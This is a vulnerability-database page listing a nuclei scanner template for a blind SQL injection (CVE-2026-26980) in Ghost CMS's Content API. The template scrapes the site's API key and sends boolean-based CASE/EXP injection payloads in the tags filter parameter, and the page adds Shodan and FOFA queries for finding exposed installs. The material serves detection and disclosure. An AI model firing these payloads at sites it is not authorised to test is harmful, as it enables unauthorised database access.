Lucene search
K

Ghost CMS Content API - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 165 Views

Ghost CMS Content API SQL injection on /ghost/api/content/tags/ via filter; upgrade to 6.19.1.

Related
Refs
Code
id: CVE-2026-26980

info:
  name: Ghost CMS Content API - SQL Injection
  author: domwhewell-sage
  severity: critical
  description: |
    Ghost CMS before 6.19.1 is vulnerable to a blind SQL injection in the /ghost/api/content/tags/ endpoint via the filter parameter. This template checks for the vulnerability by sending a boolean-based payload.
  impact: |
    An unauthenticated attacker can extract arbitrary data from the Ghost database including user credentials, API keys, and all content, potentially leading to full compromise of the CMS.
  remediation: |
    Upgrade Ghost CMS to version 6.19.1 or later which uses parameterized queries for slug filter ordering.
  reference:
    - https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97
    - https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91
    - https://nvd.nist.gov/vuln/detail/CVE-2026-26980
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 9.4
    cve-id: CVE-2026-26980
    epss-score: 0.69996
    epss-percentile: 0.99294
    cwe-id: CWE-89
    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: ghost
    product: ghost
    framework: node.js
    shodan-query: http.component:"Ghost"
    fofa-query: app="Ghost"
  tags: cve,cve2026,ghost,ghostcms,sqli,vuln,vkev

flow: |
  http(1) && http(2) && http(3)

http:
  - id: extract-api-key
    method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    extractors:
      - type: regex
        name: api_key
        part: body
        group: 1
        regex:
          - 'data-key="([a-f0-9]{20,})"'
        internal: true

  - id: extract-first-slug
    method: GET
    path:
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:-null"

    extractors:
      - type: json
        part: body
        name: first_slug
        json:
          - '.tags[0].slug'
        internal: true

  - id: check-sqli
    method: GET
    path:
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=0 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"

    matchers:
      - type: dsl
        dsl:
          - "len(body_1) != len(body_2)"
# digest: 490a0046304402207816a74d5ad419638deeb17d63d773b5c8410bf4021804c0e6e429a89067369802207444da8591cea8f38f196bfcf35edcdd73281edb3c3647eb443d9a9e6548ad33:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2026 10:54Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.5 - 9.4
EPSS0.69996
SSVC
165